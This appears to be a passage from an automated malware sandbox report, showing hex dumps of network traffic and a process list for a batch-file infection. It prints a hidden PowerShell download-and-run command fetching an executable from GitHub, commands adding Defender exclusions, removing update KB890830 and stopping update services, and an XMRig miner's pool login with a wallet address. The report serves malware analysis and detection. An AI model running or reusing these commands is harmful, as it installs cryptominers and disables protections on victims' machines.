                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: e6 73 2f 41 8d 42 85 3c e6 73 37 41 8d 42 c6 3c f6 73 35 b8 3f 00 00 00 41 83 fa 2f 74 02 31 c0 41 83 fa 2b 41 0f 44 c1 eb 2b 0f 1f 84 00 00 00 00 00 41 83 c2 bf eb 1a 66 2e 0f 1f 84 00 00 00 00 00 41 83 c2 b9 eb 0a 41 83 c2 04 66 0f 1f 44 00 00 44 89 d0 46 0f b6 54 33 03 45 8d 5a a5 41 80 fb e6 73 2d 45 8d 5a 85 41 80 fb e6 73 33 45 8d 5a c6 41 80 fb f6 73 2f 41 bb 3f 00 00 00 41 83 fa 2f 74 03 45 31 db 41 83 fa 2b 45 0f 44 d9 eb 23 41 83 c2 bf eb 1a 66 2e 0f 1f 84 00 00 00 00 00 41 83 c2 b9 eb 0a 41 83 c2 04 66 0f 1f 44 00 00 45 89 d3 c1 e2 12 41 c1 e0 0c 41 09 d0 c1 e0 06 44 09 d8 44 09 c0 41 89 c0 41 c1 e8 10 48 8d 51 01 44 88 44 0d 00 4c 8b 06 4c 39 c2 73 0e 88 64 0d 01 48 83 c1 02 4c 8b 06 48 89 ca 4c 39 c2 0f 83 2b fe ff ff 88 44 15 00 48 ff c2 e9
                                                                                                      Data Ascii: s/AB<s7AB<s5?A/t1A+AD+Af.AAfDDFT3EZAs-EZAs3EZAs/A?A/tE1A+ED#Af.AAfDEAADDAAHQDDLL9sdHLHL9+DH
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 84 3a 50 00 c6 05 7f 3a 50 00 00 48 8d 15 6e 3a 50 00 48 89 f1 e8 b6 71 00 00 48 89 f1 48 89 da e8 9b 71 00 00 48 c7 84 24 80 00 00 00 00 00 00 00 48 89 f1 e8 a7 71 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 8c 24 82 00 00 00 66 89 84 24 80 00 00 00 48 89 b4 24 88 00 00 00 0f 57 f6 0f 29 b4 24 d0 00 00 00 0f 29 b4 24 e0 00 00 00 c7 84 24 d0 00 00 00 30 00 00 00 c7 84 24 e8 00 00 00 40 00 00 00 48 8d 84 24 80 00 00 00 48 89 84 24 e0 00 00 00 0f 29 b4 24 f0 00 00 00 48 c7 44 24 60 00 00 00 00 0f 29 b4 24 b0 00 00 00 c7 44 24 50 00 00 00 00 48 c7 44 24 48 00 00 00 00 c7 44 24 40 20 00 00 00 c7 44 24 38 00 00 00 00 c7 44 24 30 03 00 00 00 c7 44 24 28 80 00 00 00 48 c7 44 24 20 00 00 00 00 48 8d 4c 24 60 4c 8d 84 24 d0 00 00 00 48 8d b4 24 b0 00 00 00 ba 00 00 11
                                                                                                      Data Ascii: :P:PHn:PHqHHqH$HqEf$f$H$W)$)$$0$@H$H$)$HD$`)$D$PHD$HD$@ D$8D$0D$(HD$ HL$`L$H$
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 24 40 00 00 00 00 e8 73 6c 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 4c 24 42 66 89 44 24 40 48 89 7c 24 48 0f 57 c0 0f 29 44 24 50 0f 29 44 24 60 c7 44 24 50 30 00 00 00 c7 44 24 68 40 00 00 00 48 8d 44 24 40 48 89 44 24 60 0f 29 44 24 70 48 c7 44 24 28 00 00 00 00 48 8d 4c 24 28 4c 8d 44 24 50 ba 06 00 03 00 e8 9d d8 ff ff 85 c0 78 42 48 c7 44 24 30 00 00 00 00 48 89 f1 e8 fd 6b 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 4c 24 32 66 89 44 24 30 48 89 74 24 38 48 8b 4c 24 28 48 8d 54 24 30 e8 9d d8 ff ff 48 8b 4c 24 28 e8 3a d7 ff ff 90 48 81 c4 88 00 00 00 5f 5e c3 cc 41 57 41 56 41 55 41 54 56 57 55 53 48 81 ec 48 05 00 00 4c 89 ce 48 89 d0 48 89 ca 4c 8b 8c 24 b0 05 00 00 4c 89 44 24 20 c7 44 24 28 01 00 00 00 48 8d 4c 24 40 49 89 c0 e8 22 e9 ff ff 48 8b 4c
                                                                                                      Data Ascii: $@slEfL$BfD$@H|$HW)D$P)D$`D$P0D$h@HD$@HD$`)D$pHD$(HL$(LD$PxBHD$0HkEfL$2fD$0Ht$8HL$(HT$0HL$(:H_^AWAVAUATVWUSHHLHHL$LD$ D$(HL$@I"HL


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.94971395.179.241.2034434680C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 12:02:45 UTC598OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 31 7a 71 55 4a 6d 55 6d 52 39 4d 36 72 54 62 61 45 48 69 58 31 35 44 50 77 70 78 4c 41 6f 56 48 46 69 74 4a 32 43 35 32 32 6d 73 65 32 39 79 46 37 75 75 67 6b 5a 5a 56 32 44 45 33 4b 48 50 70 57 4c 51 65 6d 73 69 47 31 5a 7a 38 34 34 63 65 63 63 44 6b 34 6d 4d 4e 33 4b 73 50 47 70 22 2c 22 70 61 73 73 22 3a 22 66 72 75 6b 74 6f 6f 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69
                                                                                                      Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"41zqUJmUmR9M6rTbaEHiX15DPwpxLAoVHFitJ2C522mse29yF7uugkZZV2DE3KHPpWLQemsiG1Zz844ceccDk4mMN3KsPGp","pass":"fruktoo","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigi
                                                                                                      2024-10-08 12:02:45 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 62 31 34 64 61 32 65 2d 33 31 34 66 2d 34 33 64 35 2d 62 64 64 63 2d 31 32 64 66 38 63 39 31 33 33 36 36 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 33 62 65 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 39 35 66 65 32 36 36 39 30 38 30 62 33 34 64 31 30 65 64 65 36 61 39 65 62 30 38 62 63 38 35 66 66 66 37 30 33 36 37 33 33 65 38 63 38 32 37 32 38 63 39 61 32 65 61 33 39 33 37 33 36 36 64
                                                                                                      Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"1b14da2e-314f-43d5-bddc-12df8c913366","job":{"blob":"1010e3be94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b80000000095fe2669080b34d10ede6a9eb08bc85fff7036733e8c82728c9a2ea3937366d
                                                                                                      2024-10-08 12:03:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 33 62 65 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 62 65 63 65 31 63 33 34 35 37 32 39 36 63 61 33 63 61 65 30 32 34 33 33 61 39 66 66 39 39 36 34 65 34 37 38 62 62 38 64 39 32 34 30 64 61 39 30 66 39 61 64 61 37 39 36 31 33 33 38 64 63 30 63 36 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 32 34 64 34 66 32 33 2d 64 34 38 65 2d 34 39 33 64 2d 38 61 32 36 2d 37 62 65 30 33 62 37 37 31 63 32 32 22 2c 22 74 61
                                                                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e3be94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b800000000bece1c3457296ca3cae02433a9ff9964e478bb8d9240da90f9ada7961338dc0c68","job_id":"f24d4f23-d48e-493d-8a26-7be03b771c22","ta
                                                                                                      2024-10-08 12:03:06 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 39 62 65 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 37 37 66 63 62 39 64 39 37 63 34 66 35 38 30 66 31 66 34 66 61 65 39 66 34 62 66 62 31 36 34 35 38 66 66 34 64 62 37 31 39 34 31 64 32 62 36 61 39 63 31 30 34 64 38 30 33 36 62 36 39 39 34 36 37 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 65 31 63 65 36 66 36 2d 61 38 30 65 2d 34 32 62 37 2d 61 62 33 35 2d 34 30 62 64 32 36 39 61 31 65 61 38 22 2c 22 74 61
                                                                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f9be94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b80000000077fcb9d97c4f580f1f4fae9f4bfb16458ff4db71941d2b6a9c104d8036b6994670","job_id":"0e1ce6f6-a80e-42b7-ab35-40bd269a1ea8","ta
                                                                                                      2024-10-08 12:03:28 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 66 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 64 62 62 34 62 62 38 35 31 34 32 39 31 35 30 38 32 32 34 31 63 38 63 34 38 63 35 35 30 39 38 34 63 63 30 32 37 32 65 64 35 37 32 63 37 34 63 62 37 65 61 33 66 39 32 65 61 63 39 38 31 30 32 31 37 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 63 64 31 64 32 30 32 2d 34 39 65 36 2d 34 62 33 33 2d 39 61 31 61 2d 34 30 38 39 62 30 30 66 38 65 63 65 22 2c 22 74 61
                                                                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108fbf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b800000000dbb4bb85142915082241c8c48c550984cc0272ed572c74cb7ea3f92eac98102178","job_id":"2cd1d202-49e6-4b33-9a1a-4089b00f8ece","ta
                                                                                                      2024-10-08 12:03:50 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 35 64 38 62 65 30 37 37 66 66 35 61 64 34 33 61 39 66 33 35 34 32 37 64 32 66 33 66 35 30 37 32 64 61 34 64 36 31 63 34 34 38 33 32 62 32 31 62 35 36 32 37 38 37 39 36 30 31 30 65 38 33 32 34 37 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 38 31 37 36 38 66 65 2d 61 32 39 32 2d 34 30 36 39 2d 39 34 64 61 2d 62 61 39 31 66 63 62 64 65 38 31 31 22 2c 22 74 61
                                                                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a5bf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b8000000005d8be077ff5ad43a9f35427d2f3f5072da4d61c44832b21b56278796010e83247a","job_id":"881768fe-a292-4069-94da-ba91fcbde811","ta
                                                                                                      2024-10-08 12:03:59 UTC256OUTData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 31 62 31 34 64 61 32 65 2d 33 31 34 66 2d 34 33 64 35 2d 62 64 64 63 2d 31 32 64 66 38 63 39 31 33 33 36 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 38 31 37 36 38 66 65 2d 61 32 39 32 2d 34 30 36 39 2d 39 34 64 61 2d 62 61 39 31 66 63 62 64 65 38 31 31 22 2c 22 6e 6f 6e 63 65 22 3a 22 36 34 30 38 30 30 30 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 36 30 35 33 63 32 30 62 38 63 63 61 63 38 64 61 63 32 39 66 38 34 31 35 39 32 64 34 34 30 65 33 37 63 65 62 62 32 30 35 61 36 64 65 39 36 38 32 30 37 63 34 65 34 39 38 39 35 64 31 30 30 30 30 22 2c 22 61 6c 67 6f 22 3a 22 72 78 2f 30 22 7d 7d 0d
                                                                                                      Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"1b14da2e-314f-43d5-bddc-12df8c913366","job_id":"881768fe-a292-4069-94da-ba91fcbde811","nonce":"64080000","result":"6053c20b8ccac8dac29f841592d440e37cebb205a6de968207c4e49895d10000","algo":"rx/0"}}
                                                                                                      2024-10-08 12:03:59 UTC63INData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4f 4b 22 7d 7d 0a
                                                                                                      Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}
                                                                                                      2024-10-08 12:04:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 63 38 32 39 39 61 64 62 34 36 64 35 36 63 33 37 64 31 32 35 38 65 30 64 65 63 33 36 39 61 38 30 33 66 66 64 61 39 39 37 66 63 30 64 30 38 31 33 61 66 62 38 65 36 37 61 39 36 32 39 63 62 61 35 37 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 36 36 38 36 31 31 61 2d 35 30 64 33 2d 34 38 64 30 2d 61 30 35 36 2d 34 39 61 37 66 31 39 62 65 62 36 35 22 2c 22 74 61
                                                                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a5bf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b800000000c8299adb46d56c37d1258e0dec369a803ffda997fc0d0813afb8e67a9629cba57a","job_id":"1668611a-50d3-48d0-a056-49a7f19beb65","ta
                                                                                                      2024-10-08 12:04:11 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 62 62 66 39 34 62 38 30 36 64 39 37 39 30 30 66 31 36 32 32 34 66 63 65 39 65 33 61 63 61 33 30 34 38 39 64 65 34 34 30 31 36 36 36 37 37 64 37 38 38 33 32 31 30 34 64 31 37 31 36 61 64 31 34 66 34 66 30 66 38 39 62 38 30 30 30 30 30 30 30 30 33 66 63 35 30 61 62 63 66 64 37 35 62 38 37 66 31 35 62 37 33 30 33 33 32 35 61 62 32 36 30 32 31 64 61 31 63 37 39 64 32 63 61 39 31 32 66 38 37 32 39 65 36 65 37 32 31 36 36 31 34 66 35 31 37 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 37 62 30 37 64 62 66 2d 34 34 39 64 2d 34 32 66 39 2d 39 63 30 65 2d 62 39 64 30 31 38 64 36 65 33 64 32 22 2c 22 74 61
                                                                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bbbf94b806d97900f16224fce9e3aca30489de440166677d78832104d1716ad14f4f0f89b8000000003fc50abcfd75b87f15b7303325ab26021da1c79d2ca912f8729e6e7216614f517f","job_id":"57b07dbf-449d-42f9-9c0e-b9d018d6e3d2","ta


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.949714104.20.4.2354434680C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 12:02:46 UTC114OUTGET /raw/FBXiGyZ9 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Connection: close
                                                                                                      Host: pastebin.com
                                                                                                      User-Agent: cpp-httplib/0.12.6


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:08:02:18
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "
                                                                                                      Imagebase:0x7ff716550000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:08:02:18
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:08:02:18
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
                                                                                                      Imagebase:0x7ff760310000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:08:02:34
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
                                                                                                      Imagebase:0x7ff760310000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:08:02:35
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1348.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1348.exe"
                                                                                                      Imagebase:0x7ff795d50000
                                                                                                      File size:5'288'736 bytes
                                                                                                      MD5 hash:1A67A432E7AB0BCD2189F3F4142F2AE4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 76%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:08:02:35
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                      Imagebase:0x7ff760310000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:08:02:35
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                      Imagebase:0x7ff716550000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:14
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\wusa.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                      Imagebase:0x7ff66e720000
                                                                                                      File size:345'088 bytes
                                                                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:16
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:17
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:18
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:19
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:20
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
